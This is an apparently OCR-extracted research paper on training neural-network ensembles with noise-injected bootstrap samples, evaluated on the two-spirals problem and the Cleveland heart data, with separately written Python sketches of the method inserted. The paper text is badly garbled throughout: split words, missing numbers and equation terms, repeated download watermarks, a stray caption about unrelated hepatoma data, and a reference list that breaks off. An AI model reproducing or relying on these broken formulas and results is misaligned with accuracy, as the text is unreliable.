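as a concrete illustration of the residual-resampling variant just described, the following python sketch (our own illustration, with a least-squares line standing in for the estimated f̂ and numpy as the only dependency) fits f̂, collects the residuals ε_i, and builds bootstrap samples of the form f̂(x) + ε*, optionally perturbing the resampled residuals with a small gaussian term as in the smoothed bootstrap; the sample size k and the smoothing level are placeholders.

import numpy as np

rng = np.random.default_rng(0)
x = rng.uniform(-1, 1, size=200)
y = 2.0 * x + rng.normal(0, 0.1, size=200)       # toy data of the form y = f(x) + eps

# fit an empirical f_hat (here a least-squares line) and keep the residuals
slope, intercept = np.polyfit(x, y, deg=1)
residuals = y - (slope * x + intercept)

def bootstrap_sample(k, smooth_sd=0.0):
    # draw k inputs and k residuals with replacement; smooth_sd > 0 gives the
    # smoothed bootstrap, which lets k exceed the original sample size while
    # keeping the resampled sets distinct
    idx = rng.integers(0, len(x), size=k)
    eps_star = residuals[rng.integers(0, len(residuals), size=k)]
    eps_star = eps_star + rng.normal(0, smooth_sd, size=k)
    return x[idx], (slope * x[idx] + intercept) + eps_star

x_star, y_star = bootstrap_sample(k=400, smooth_sd=0.05)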
it sh ould b e noted that if fà is b iase d, the noise vector m ay be over-estim ated. f or classi® cation p roblems, the form y f(x « ) m ay b e more ap pro priate. in this case, using noise injection to the inputs during training can im prove the generalization p roperties of the estim ator (sietsm a & d ow, ). r ecently, b ish op ( ) has sh own that training w ith sm all am ounts of noise is locally equivalent to sm oothness regularization. in this paper, we give a diffe rent interpretation to noise added to the input during training, and view it as a regularizing param eter that controls, in conju nction w ith ensem b le averaging, the cap acity and the sm oothness of the estim ator. t he m ajo r role of this noise is to push diffe rent estimators to diffe rent local m inim a, and so prod uce a m ore independent set of estim ators. b est perform ance is then achieved by ave raging over the estim ators. for this regularization, the level of the noise m ay b e larger than the `true’ level wh ich can b e indirectly estim ated. since we want to study the effec t of bo otstrappin g with noise on the sm oothness of the estim ator, separated from the task of inp ut noise estim ation, w e consider a highly non-lin ear, noise-fre e classi® cation prob lem , and sho w that even in this extreme case, addition of noise during training im proves results signi® cantly. w e cho se a p roblem that is very dif® cult fo r fe edfo rw ard neural networks (n n s). it is dif® cult due to the h ighly non-lin ear nature of the decision bo undaries, and the fac t that these non-lin earities are easier to represent in local radially sym m etric fu nctions rath er than in ridge fu nctions such as those given by fe edforw ard sigm oidal fu nctions. since the training data are given w ith no noise, it seems unreasonable to train a netw ork with noise, but we sho w that even in this case training with noise is a very effective app roach fo r sm oothing the estim ator. in addition to dem onstrating our m ethod on a diffe rent class of predictorsÐ the generalized additive m odelsÐ we also app ly it to another well-kn own data setÐ the c leveland heart data (d etrano et al., ). . t heoretical c onsideratio ns t here are a num ber of factors that have to be app lied carefully w hen trying to regularize an estim ator. t he regularization is aim ed at ® nding an op tim al trade-off between the varian ce and b ias of the estim ator (g em an et al., ), and fo r best perfo rm ance one has to utilize this decom po sition of the error fu nction. th e m otivation to our ap pro ach follow s from a key ob servatio n regarding the b ias variance decom positio n, nam ely the fact that ensem b le ave raging does not affe ct the bias p ortion of the error, b ut reduces the varian ce w hen the estim ators on wh ich averaging is done are independent. . . bias/v ariance t rade-off for en semble of p redictors t he classi® cation pro blem is to estim ate a fu nction f x (x) of observed data charac teristics x, predicting class labe l y, b ased on a given training set x {(x , y )}, . . . , (x l, y l)} using som e m easure of the estim ation error on x . d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise a good estim ator w ill perfo rm well not only on the training set, but also on new valid ation sets wh ich were not used during estim ation. 
evalu ation of the perfo rm ance of the estim ator is com m only done via the m ean squ ared error (m se) distance b y taking the expectation with respect to the (unknown) p robability distribu tion p of y: e[(y f x (x)) u x, x ] t his can be decom p osed into e[(y f x (x)) u x, x ] e[(y u x]) u x, x ] e[(f x (x) e [y u x]) ] t he ® rst term does not depend on the training data x or on the estim ator f x (x); it m easu res the am ount of noise or variab ility of y given x. h ence, f can b e evaluated using e[(f x (x) e[y u ]) ] t he em pirical m se of f is given by e x [(f x (x) e[y u x]) ] wh ere e x represents expectation with resp ect to all possib le training sets x of ® xed size. t o see fu rther the perfo rm ance under m se, we decom po se the error to b ias and varian ce com po nents to get e x [(f x (x) e[y u x) ] (e x [f x (x)] e[y u x]) e x [(f x (x) e x [fd (x)]) ] ( ) t he ® rst term on the right-han d sid e is called the b ias of the estim ator and the second term is called the variance. w hen training on a ® xed training set x , reducing the bias with resp ect to this set m ay increase the variance of the estimator and contribute to po or generalization perform ance. t his is known as the trade-off between variance and bias. t ypic ally, varian ce is reduced by sm oothing; how ever, this m ay introduce bias (since, fo r exam ple, it m ay blur sharp peaks). b ias is reduced by prio r know ledge. w hen prio r know ledge is used also fo r sm oothing, it is likely to reduce the overall m se of the estim ator. w hen training n n s, the varian ce arise s from tw o term s. t he ® rst term com es from inherent data ran dom ness and the second term com es fro m the non- identi® ability of the m odel, nam ely, the fac t that for a given training data, there m ay be several (local) m inim a of the error su rface. c onsid er the ensem ble ave rage fÅ of several predictors, e.g. n n s with diffe rent random initial w eights which are trained on data with added g aussian noise: fÅ (x ) n o n i f i (x ) t hese predictors are identically distributed and, thus, the varian ce contribution (equation ( )) becom es (we om it x and x for clarity) e [( fÅ e [ fÅ ]) ] e f s n o f i e f n o f i g d g e f s n o f i d g s e f n o f i g d e f n o f i e f n o f i g g d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator e f s n o f i d g s e f n o f i g d ( ) t he ® rst term on the righ t-h and sid e can be rewritten as e f s n o f i d g n o e [ f i ] n o i , j e [ f i f j ] and the second term gives s e f n o f i g d n o e [ f i ] n oi , j e [ f i ]e [ f j ] plugging these equalities in equation ( ) gives e [( fÅ e [ fÅ ]) ] n o {e [ f i ] (e [ f i ]) } n oi , j {e [ f i f j ] e [ f i ]e [ f j ]} ( ) if the predictors { f i } are highly correlated, fo r exam p le if f i f j f fo r all i , j , then the abo ve equation becom es var ( fÅ ) n v ar ( f ) n n ( n ) v ar ( f ) var ( f ) nam ely, there is no reduction in varian ce in this case. if the predictors are identically distrib uted and independent, then the second term drop s and we are left with var ( fÅ ) n v ar ( f i ) n ote that e [ f i f j ] e [ f i ]e [ f j ] e ({ f i e [ f i ]}{ f j e [ f j ]}) t hus, the notion of independence can be understood as independence of the deviations of each predictor from the expected valu es of the p redictor, which can be replaced (due to linearity) by e ({ f i e [ fÅ ]}{ f j e [ fÅ ]}) and is thus interpreted as an independence of the prediction variation aro und a com m on m ean. 
t he success of ensem ble averag ing of n n s in the past (b reim an, ; h ansen & salam on, ; p errone, ; w olp ert, ) is due to the fact that n n s have in general m any local m inim a, and thus even with the sam e training set, diffe rent local m inim a are fo und when starting from diffe rent ran dom initial conditions. t hese diffe rent local m inima lead to so m ewh at independent predictors, and thus the averaging can reduce the varian ce. w hen a larger set of independent networks is needed, but no m ore data are availab le, data reuse m ethods can help. bootstrap- ping (breim an, ) has been very helpfu l, since by resam p ling (with return) from the training data, the independence of the training sets is increased, and hence, the independence of the estim ators, leading to im prove d ensem ble results. sm oothed bo otstrap (k rogh & h ertz, ; r ipley, ) is potentially m ore usefu l sin ce larger sets of independent training sam ples can be generated. th e sm oothed bo otstrap approa ch am ounts to generating larger data sets by sim ulating the true noise in the data. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise . t he b ootstra p e nsem ble w ith n oise a lgorithm in the boo tstrap ensem ble with noise (b en ), w e p ush the idea of noise injection fu rther; we observe that adding noise to the inputs increases the ® rst term on the right-han d sid e of equation ( ), i.e. adds varian ce to each estim ator, but, on the other han d, decreases the contribution of the second term on the right-han d sid e as it increases the independence between estim ators. instead of usin g the `true’ noise (estim ated from the data) for b ootstrap, we seek an optim al noise level which gives the sm allest contribution to the error fro m the sum of the two com po nents of the varian ce. it is im po ssible to calculate the optimal varian ce of the g aussian noise without k nowing f explicitly; therefore, the value of this varian ce rem ains a regularization term : a param eter which has to be estim ated so as to m inim ize the total contribution of the varian ce to the error. furtherm ore, sin ce the injection of noise increase s the independence betw een diffe rent training sets, we can use bo otstrap sets that are larger than the original training set. th is does not affe ct the bias (if the noise is sym m etric arou nd zero) but can reduce the varian ce. n ote that the bias contribution to the error is not affe cted by introducing the ensem ble- averag e estim ator due to linearity of expectations. it fo llows that the ben approa ch has the po tential of reducing the contribution of the varian ce term to the total erro r. w e thus sho uld seek a differen t trade-off po int b etween the contribution of the varian ce and the b ias. in other words, we are able to use large (unbiased ) networks w ithout being affe cted by the large varian ce assoc iated w ith su ch networks. t his obse rvatio n im plies that the estim ation of optim al noise levels shou ld not be based on a single estim ator perform ance, b ut rath er base d on the ensem ble perfo rm ance. th e large varian ce of each sin gle network in the ensem ble can be tem pered w ith a regularization such as w eight decay (k rogh & h ertz, ; r ipley, ), but, again, the estim ation of the optim al regularization factor sho uld be done on the ensem ble-averaged perfo rm - ance. breiman ( ) and r ipley ( ) sho w com pelling em pirical evidence fo r the im po rtance of weight decay as a single network stab ilizer. 
our resu lts con® rm this fact under the ben m odel. t he ben algorithm · let {( x i , y i )} be a set of training p atterns for i , . . . , n . · let « { « , . . . , « j }. · let l { l , . . . , l i }. · f or a noise level « j estim ate an op tim al penalty term fo r weight decay l i : Ð fix a size k fo r the bo otstrap sam ple, su ch that k @ n (we used k n ). Ð let s , s , . . . , s k b e a set of indices, chosen fro m a unifo rm distribution, s i , u ( , n ). Ð for a « j , create a noisy b ootstrap resam p le of the training set inputs: { x s i z i }i ,...,k and the corresp onding resam pled outputs { y s i }i ,...,k wh ere z i is a vector who se com po nents are n ( , « j ). Ð train several networks with the noisy sam ples using weight decay l , . . . , l i . Ð g enerate an ensem ble averag e of the set of netw orks. Ð ch oose via cross-v alidation or a test set, the op tim al weight decay l . · r epeat the process for the new choice of noise « j until there is no im pro vem ent in prediction. in the sim ple case, the sam e noise level is used for each dim ension. t his is su itable d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . th e two-spira ls training data (left). t raining points with noiseÐ standard deviation, sd . (right). a s can b e seen, the noise level that contam inates the data causes objects to cross the virtual bo undary de® ned b y the data, i.e. the noise leads to wrong class lab elling for the training data. th is reduces perfo rm ance of sin gle predictors, but the added independence b etween the predictors leads to im proved ensem ble perform ance. fo r problem s in wh ich each of the dim ensions are on the sam e scale, or, m ore precisely, wh en the noise distribu tion is sim ilar in differen t data dim ensions. w hen all covariates have the sam e interpretation, e.g. sim ilar m easu rem ents taken at differen t tim e steps, or w hen dealing with pixel data, su ch noise assu m ption is adequate; ho wever, wh en the noise is non-h om ogeneous in spac e, has a non- diagonal covariance m atrix or wh en differen t dim ensions represent com pletely differen t m easurem ents, it is best to estim ate the diffe rent noise levels in each dim ension sep arately. w hen this is too costly, or there is insu f® cient data fo r robu st estim ation, a quick solution is to sph ere the data by setting the varian ce in each dim ensio n to b e the sam e and with zero m ean. . . t he t w o-sp irals prob lem t he `tw o-spira ls’ p roblem consists of a training set with x ± y valu es, h alf of wh ich are to prod uce a output and half a output. t hese training p osts are arran ged in tw o interlocking sp irals that go aro und the origin three tim es, as sh own in f igure . t he problem was p ropo sed to the c m u benchm ark by a lexis w ieland of m itr e corpo ration (see a ppe ndix a for a description of the problem ). it ap pears to be extrem ely hard fo r bac kpropo gation networks due to its h igh non-lin earity. it is easy to see that the two-d im ensional po ints of the spirals could not b e separated by a sm all com bination of linear separators. lang and w itbrock ( ) prop osed a ± ± ± ± network with sh ort-cuts usin g weights. t hey used a variant of the q uick-p rop learn ing algorithm (fahlm an, ) with weight decay. t hey claim ed that the prob lem could not be solve d with sim pler architecture (i.e. less laye rs or without sho rt-cuts). t heir result on the sam e data set seem s to give po or generalization results. 
baum and lang ( ) dem onstrated that there are m any sets of weights that would cause a ± ± network to be consistent with the training set; ho wever, the sin gle-layer feedfo rw ard architecture trained with error bac kprop agation was unable to ® nd any of them when starting w ith ran dom initial weights. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f ahlm an and lebiere ( ) used the cascade-correlation architecture for this prob lem . t hey got b etter resu lts, b ut still little `spiraln ess’ . recently, d effu ant ( ) su ggested the `perceptron m em b ran e’ m ethod that uses piecewise linear surfaces as discrim inators, and applied it to the sp iral prob lem . h e used perceptrons b ut had dif® culties cap turing the structure of the spirals due to the piecewise linearity of his decision bo undaries. t he two-spiral problem w as cho sen for this study because it is a hard prob lem fo r bac kpropagation netw orks due to h igh non-linearity, it is a noise-free problem , and the generalization perform ance of diffe rent predictors can be easily visualized on the two-d im ensional plan e. in section , we dem onstrate our m ethod on another well-know n m ach ine- learn ing problem , the prediction of coronary artery disease b ased on the cleveland heart data, wh ich reside in the u niversity of c alifo rnia at irvine (u ci) m ach ine- learn ing repository (m urphy & a ha, ). . r esults on the s piral d a ta . . feedforward n etwork architecture w e used riple y’ s ( ) s-p lus n n et pac kage, wh ich im plem ents bac kpropaga- tion. t he m inim ization criterion is m se with w eight-d ecay regularization of the fo rm e o p u t p y p u l o i, j w i, j wh ere t p is the target and y p the output fo r the p th exam p le pattern. w i , j are the weights and l is a param eter that controls the am ount of w eight decay regulariza- tion. t he network architecture w as ± ± (two inp uts, hidden units and one output). t he ® rst and last laye rs were fu lly connected to the hidden laye r giving a total of weights. th e transfe r fu nction of the hidden and output units was the logistic sigm oidal fu nction. th e initial weights were ran dom from u ( . , . ). it shou ld be noted here that alth ough w e are training ± networks, the effe ctive num ber of param eters is not m ore (and probab ly even less) than the num ber of param eters fo r a sin gle network. t his is because we do not have the ¯ exibility to estim ate an optim al com bination of predictors, but rather take the sim ple averag e of them. b ase line results were obtained by training network s without any regulariza- tion. w e derived then an averag e p redictor wh ose output is the mean of all the nets’ outputs (f igure (top left)). t he p redictor h ad no sm oothness constrain ts and therefore fou nd relatively linear bo undaries (this can also be seen in figure (top left), where a ® ve-n et ensem ble averag e is taken). . . . e ffect of tra ining with noise on a ¯ exible predictor. w e trained hidden-unit networks using the b ootstrap m ethod (as describ ed in section ), with noise sd ranging from « to « . , and k n . f igure dem onstrates the effec t of noise on the p redictor. each im age is a thresho ld output of a ® ve-net ensem ble averag e predictor. n oise level goes fro m « in the upp er left im age through « . in the lower right. 
th e classi® cation results are draw n on a uniform grid of p oints (nam ely, a m uch larger test set) so as to get a clear view of the d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . sum m ary of -n et ensemb le resu lts. t op left: n o constrain ts ( no w eight decay or noise). top righ t: op tim al weight decay ( l e ) and no noise. bottom left: o ptim al noise (g aussian sd . ) and zero w eight decay. bottom right: o ptim al noise and optim al weight decay. t he classi® cation threshold in this ® gure and the fo llowing ones is . . classi® cation bo undaries de® ned by the classi® er. it can be seen that for sm all noise levels « , the ensemb le ave rage predictor is unable to ® nd any sm ooth structure in the data and m erely over-® ts to the training data. f or m oderate levels of noise, a better structure can be fo und, and for large levels of the noise, the data are so corrup ted that again no structure can b e fou nd. t he optim al noise sd was arou nd « . . . . . e ffect of weight-d ecay regula riz ation. w eight-d ecay regularization involve s ® nding an optim al param eter l that controls the am ount of w eight decay versu s the bias of the net. w e trained networks with differen t l ’ s and fou nd that optim al valu es were aro und l e . w h en com paring the effe ct of ave raging alone with the effe ct of regularization via weight decay with no averaging, it turns out that the bo otstrap m ethod (averaged over differen t initial network w eights) h as better generalization p roperties than the weight-d ecay m ethod. the w eight-d ecay regu- larization does not generaliz e well on the outer points, w here the training data are m ore sparse . . . . a pplyin g bootstrap to netw orks with weight decay. o ur best results w ere obtained when app lying the b en m ethod to netw orks with optim al weight-decay regularization. figure demonstrates the effe ct of bo otstrap with noise on the perfo rm ance of a ® ve-n et ensem ble trained with optim al weight decay. the effe ct of ensem ble averaging over network s that were trained with diffe rent ran dom initial conditions only is dem onstrated in the top left im age w hich represents no d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f igure . effe ct of training with diffe rent levels of g aussian noise. ensem bles of ® ve networks with no w eight decay and a varyin g degree of noise (top left is zero noise, bottom right is noise with sd . ). noise during training. o ptim al noise valu es are sim ilar to those obtained w hen training with no weight decay, and are su rp risin gly high (see figure (right) fo r the corrup tion of noise to the data). a lthough the results look better than those with no weight decay, in the sense that the bo undaries look sm oother, they can still be im p roved by ave raging on a larger ensem ble of network s. t his is dem onstrated in the next section (figure ). t he effec t of averag ing is su mm arized in figure . it can be seen that the -n et ensem b le ave raging resu lts, with no weight decay and no noise are better than the correspo nding ones wh en an ensemb le of ® ve nets is used (figure ). sim ilarly, the results for an ensem ble of netw orks trained w ith optimal w eight decay with no noise are better than the corresponding ® ve-n et ensem ble (figure (top left)). finally, the com bination of weight decay, noise and -n et ensem ble clearly gives the best resu lts (f igure (bottom right)). 
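the procedure evaluated above can be sketched in a few lines of python. the sketch below is an illustration under our own assumptions, not the original s-plus code: it uses scikit-learn's MLPClassifier, whose alpha parameter plays the role of the weight-decay penalty λ in the criterion E = Σ_p ||t_p − y_p||² + λ Σ_{i,j} w_{i,j}², adds gaussian noise to bootstrap resamples of the inputs, and averages the outputs of the ensemble members before thresholding. the function names, the hidden-layer size, the noise level and the spiral constants (a commonly cited parameterization of the cmu benchmark, not the elided values in appendix a) are all placeholders.

import numpy as np
from sklearn.neural_network import MLPClassifier

rng = np.random.default_rng(0)

def two_spirals(n=97):
    # commonly cited parameterization of the cmu two-spirals benchmark (assumed here)
    i = np.arange(n)
    phi = i * np.pi / 16.0
    r = 6.5 * (104 - i) / 104.0
    a = np.column_stack([r * np.sin(phi), r * np.cos(phi)])
    x = np.vstack([a, -a])
    y = np.concatenate([np.ones(n), np.zeros(n)])
    return x, y

def ben_ensemble(x, y, noise_sd, weight_decay, n_nets=5, k=None):
    # bootstrap ensemble with noise: each member is trained on a bootstrap
    # resample of size k with gaussian noise added to the inputs
    k = k or 2 * len(x)
    nets = []
    for seed in range(n_nets):
        idx = rng.integers(0, len(x), size=k)
        x_noisy = x[idx] + rng.normal(0, noise_sd, size=(k, x.shape[1]))
        net = MLPClassifier(hidden_layer_sizes=(30,), alpha=weight_decay,
                            max_iter=2000, random_state=seed)
        nets.append(net.fit(x_noisy, y[idx]))
    return nets

def ensemble_predict(nets, x, threshold=0.5):
    # simple average of the member outputs, thresholded as in the figures
    p = np.mean([net.predict_proba(x)[:, 1] for net in nets], axis=0)
    return (p > threshold).astype(int)

x, y = two_spirals()
nets = ben_ensemble(x, y, noise_sd=0.35, weight_decay=1e-4)
print((ensemble_predict(nets, x) == y).mean())   # training accuracy of the averaged nets

the grid search described in the text would wrap ben_ensemble in two loops, one over candidate noise levels and one over weight decays, and select the pair by cross-validation on the ensemble output rather than on any single network.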
t hus, while earlier work suggested that a single-laye r feedfo rw ard network is not capable of capturing the structure in the spiral data, it is evident that a netw ork ensem ble with strong control over its capacity (via weight decay) wh ich is trained with h eavy noise can discover the h ighly non-linear structure of the p roblem. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . effe ct of training with diffe rent noise levels on ® ve-n et ensem b le networks with w eight decay. n oise levels are as before, ± . from top left to bo ttom right. . . g eneralized additive m odels in this section, w e take a diffe rent ap pro ach . instead of analyzin g a method that has a hard tim e with the spiral data, we study a m odel that is very natural for it. w e apply b ootstrap ping to a generalized additive m odel (ga m ) (h astie & t ibshira ni, , ) with a polyn om ial ® t of degree on the sam e data. w e had to op tim ize the degree of the p olynomial and the span degree, which determ ines the sm oothness and the degree of locality of the estim ation. d ue to these ef® cient controls, this ¯ exib le m odel is m uch more appro priate for the spiral data. f urtherm ore, this algorithm provides a unique m odel, i.e. fo r each set of param eters, there is no variab ility in the pro duced m odels as opp osed to the variab ility generated b y the random initial weights of a feedfo rw ard network. a ll of this su ggests that there sh ould b e no reason to bo otstrap with noise, sin ce the sm oothness and locality already can control the sm oothness of the boundary surface, and there seem s no reaso n to corrupt the data with unfam iliar noise. m oreover, there is no need to ave rage over several m odels sin ce there is no variab ility due to diffe rent local m inim a of the resu lting m odel. it is thus su rprisin g that even in this extreme case, boo tstrap ping w ith noise im p roved the generalization results. figure depicts the results fo r variou s degrees of noise added during training. it is clear that the b ootstrap im pro ves resu lts, and, fu rtherm ore, sm all valu es of the noise sharp en the resu lt. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f igure . m odel estimation usin g g am with b ootstrap. t en g a m p redictors are averag ed using boo tstrap sam p les with varying degree of noise. t here is no noise (and thus no averaging) at the top left resu lt. . c le velan d h eart d ata in this section, we analyze the cleveland heart data ( d etrano et al., ), donated by d r r ob ert d etrano to the u c i m ach ine-learning repository (m urphy & ah a, ). th is data concerns diagnosis of coronary artery disease and has been used in the past b y statisticians and by the m achine-le arn ing com m unity (b razdil & h enery, ; d etrano et al., ; g ennari et al., ; stensm o, ). f urther data and pre-proc essin g details are given in ap pendix b. th e pre-processin g, which included rem oval of m issing valu es, sphe ring the data and creating dumm y variab les to replac e categorial variab les, resu lted in a dram atic im p rovem ent over p ast resu lts. m oreover, it revealed that in the new data representation, the structure is very linear since logistic regressio n was ab le to obtain a nine-fo ld cross-valid ation error of abou t . % . a sim ilar error was obtained by usin g extensive pre-p rocessing and tem po ral-diffe rence reinforcem ent learn ing (stensm o, ). 
both results are consistent with our feedforward architecture results with no noise injection and are (as far as we know) the current best results on this data. it is thus a very challenging problem for nns, as the deviation from linear structure is very small, and highly non-linear estimators such as cart, radial-basis functions and knn did not do so well on this data (brazdil & henery, ). the problem is complementary to the spiral problem that was considered before; there, we attempted to improve performance on highly non-linear data which required a large-capacity network, while here we try to improve performance on a relatively linear problem using a small-capacity network. in both cases, we show that noise cannot be replaced by network size or weight-decay regularization and is essential for good performance.

figure : results from logistic regression and from feedforward networks with three hidden units and varying degrees of weight decay. left: per cent classification error. right: roc values. all results were obtained with nine-fold cross-validation on the cleveland heart data. in both graphs, the first boxplot from the left represents the generalized linear model results.

figure summarizes the model comparison between logistic regression and nine-fold cross-validation with three hidden-unit networks based on ripley's nnet package described in section . . training was stopped after a fixed number of epochs or earlier, based on ripley's conditions. the network results were obtained by training five networks on each of the nine-fold cross-validation sets and averaging their results; thus, each classification error is generated out of many networks. in each of the following figures, the statistics were obtained from several similar runs differing in random initial conditions and in the choice of cross-validation sets from the data. the cross-validation code is based on the public-domain version of tibshirani in statlib. the results are summarized by boxplots (hoaglin et al., ); each boxplot is based on many single-network runs. as the ratio between the two classes is different from one, classification results are not a very robust measure for model comparison, since they are based on a single classification threshold. for example, if one class represents only a small fraction of the data, then setting the threshold so that the classifier always predicts the majority class will result in a trivial classifier that produces the same output regardless of the input yet has a low error rate. the receiver-operating characteristic (roc) (goodenough et al., ; hanley & mcneil, ) is frequently used in such model comparisons, especially for clinical data (henderson, ). this measure has been used by the contributor of the data (detrano, ) and in assessing neural network performance on other heart disease data (lippmann et al., ).
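a minimal python sketch of the protocol just described (dummy variables for the categorial attributes, sphering of the continuous ones as in appendix b, nine-fold cross-validation, and roc as the comparison measure) is given below. it is our own illustration: df, the column lists and the label column are placeholders rather than the actual uci field names, and logistic regression stands in for the generalized linear model baseline.

import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import StratifiedKFold

def preprocess(df, categorial, continuous):
    # dummy variables for categorial attributes, sphering for continuous ones
    dummies = pd.get_dummies(df[categorial].astype("category"))
    sphered = (df[continuous] - df[continuous].mean()) / df[continuous].std()
    return pd.concat([dummies, sphered], axis=1).to_numpy(dtype=float)

def nine_fold_roc(x, y):
    # nine-fold cross-validated area under the roc curve
    aucs = []
    for train, test in StratifiedKFold(n_splits=9, shuffle=True, random_state=0).split(x, y):
        model = LogisticRegression(max_iter=1000).fit(x[train], y[train])
        aucs.append(roc_auc_score(y[test], model.predict_proba(x[test])[:, 1]))
    return float(np.mean(aucs))

# hypothetical usage, with placeholder column names:
# x = preprocess(df, categorial=["chest_pain", "slope", "vessels", "thal"],
#                continuous=["age", "rest_bp", "cholesterol", "max_rate", "oldpeak"])
# y = df["disease"].to_numpy()
# print(nine_fold_roc(x, y))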
a lthough noise injection p roduces signi® cant im pro vem ent, the ab so lute valu es are su b- optim al sin ce the arch itecture is too large. n ote, how ever, that the r o c valu es fo r the . weight decay net are the highest comp ared with logistic regression d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f ig u r e . in te g ra te d b ia s, v a ri a n c e a n d to ta l e rr o r fo r th e h e p a to m a d a ta se t. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . the effe ct of noise injection is dim inished wh en no w eight decay is used (com pare with figure ). a n op tim al architecture of three hidden units cannot prod uce good results w ithout weight decay. left: classi® cation error. r igh t: r o c valu es. (g lm r oc . . , n n et ro c . . ; t . , degrees of fre edom (df) , p , . ; z . , p , . ) or with the optim al three hidden-unit network. w e have been usin g bo th the t-statistic (h ogg & c raig, ) and the z-statistic of the w ilcoxon test (lehm ann, ) wh ich uses a non-p aram etric ran k to test the differen ce in the m edians, as it is m ore rob ust to outliers. the r oc results suggest that the classi® cation error of this m odel could be im proved, po ssibly by averag ing over a larger num ber of network s. to see the perfo rm ance of noise injection alo ne, we present results of noise injection into zero weight-d ecay, op tim al architecture (figure ) and sho w that even under a low- cap acity architecture, w eight decay is essential to stabilize the system . o ptim al resu lts are p resented in f igure . w ith optim al w eight decay and architecture, addition of noise achieves results w hich are better than any other network, and better than logistic regression . m ean error of logistic regression was . . , m ean error for zero-no ise net w as . . and m ean erro r fo r noise w ith sd . was . . . the diffe rence b etween the op tim al neural network and logistic regression is statistically signi® cant (t . , df , f igure . r esults for the op tim al arch itecture network . left: classi® cation error. r ight: r o c values. n oise injection is h elpful and overall perform ance is optim al. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise p , . ; z . , p , . ) and the differen ce to zero noise is signi® cant as well (t . , df , p , . ; z . , p , . ). t o our knowledge, these are the best resu lts on the c leveland h eart data. . d iscussion t he motivation to our ap proach com es fro m a key obse rvatio n regarding the bias/varian ce decom po sition of prediction error, nam ely the fac t that ensem ble averag ing does not affe ct the b ias portion of the error, b ut reduces the varian ce, wh en the estim ators on w hich averaging is done are independent. th e level of noise affe cts the independency betw een the training sets, and thus the relative im p rovem ent of ensem ble averag ing. h owever, the level of noise also affec ts the quality of each predictor separately, increasing its varian ce by increasing the variab ility in the data. th us, there sho uld b e an optim al level of the noise (it m ay not correspo nd to the true noise), which leads to optimal ensemb le p erfo rm ance. t his p erform ance can be fu rther im proved if the varian ce of individual networks can b e tem pered, e.g. with weight decay. w e have dem onstrated the effe ct of noise injection on prediction in three differen t cases. 
(i) h ighly non-linear (sp iral) data, usin g a non-appro priate m odel (as the data are alm ost rad ially sym m etric and the neural net is not). this required the use of an ensem ble of high capacity sin gle predictors and thus m ade the regularization task challenging. it w as show n that the excess varian ce of high cap acity m odels could only be effec tively trim m ed b y a com bination of all three com po nents: w eight decay, noise injection and ensem ble averag ing. (ii) h ighly non-lin ear (spiral) data with essen tially the p erfect m odel for it (g a m w ith locally linear units). even in this case, w here regularization pro vides the perfect bias to the m odel, perform ance could be im pro ved by the comb ination. (iii) a highly linear prob lem , wh ere prac tically any network has excess capacity. t his case is a representative of a fam ily of clinical data sets, in which (linear) variab le selection was ap plied to h ighly dim ensional data and resulted in a highly linear low- dim ensional data structure. it was thus challenging to b e ab le to sh ow that the b en algorithm is useful in this case, and can lead to im pro ved classi® cation results. p erform ance was also evalu ated based on the r o c m easure, as it is a stan dard m odel com parison tool fo r clinical data analysis. t he theoretical analysis su ggests that it is best to start with a very ¯ exible fu nction ap proxim ation techniq ue (e.g. a feedfo rw ard network with a large num ber of hidden units) and then control its capacity and sm oothness using noise and averag ing. o ur conclusio ns are not restricted to arti® cial neural network esti- m ation. w e sho w that sim ilar conclusions can be obtained when using a h ighly ¯ exib le g a m (h astie & tibsh iran i, ). a cknow led gem ents stim ulating discussion s with leo b reim an, b rian r ipley and chris b ishop are gratefully acknowledged. n otes . an exam ple of an identi® able m odel is (logistic) regression. . w here v ar ( f ) is de® ned by e x [( f x ( x ) e x [ f x ( x )]) ]. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator . in this case, the model amounts to a sum of locally linear functions around each of the training sam ples. . v a m edical c enter, l ong beach and c leveland c linic foundation. . recent best result of . % on non-norm alized data was obtained by a com pany that provides classi® cation w ith its ow n proprietary software (u d m , ). . this is a classical problem in clinical data in which variable selection w as done by a linear m ethod and therefore the data contains m ostly variables with linear structure. . this is a standard use; see, for exam ple, results under the statl o g e sprit project (brazdil & henery, ). . http://www.stat.cm u.edu. . to read the boxplot: the white line in the m iddle of the box represents the m edian of the distribution; the grey box represents the inter-quartile range such that the bottom of the box is the ® rst quartile and the top is the third quartile; the dashed line and its terminating line represent plus and m inus . inter-quartile distance from the m edian; points lying outside this range are considered outliers, each such point is represented by a w hisker. . c an be obtained from m urphy and aha ( ). r eferences baum , e. & lang, k. ( ) c onstructing hidden units using exam ples and queries. in r. p. l ippm ann, j. e . m oody & d . s. touretzky (e ds), advances in n eural information processing systems, v ol. . san m ateo, c a: m organ kaufmann, pp. ± . bishop, c .m . 
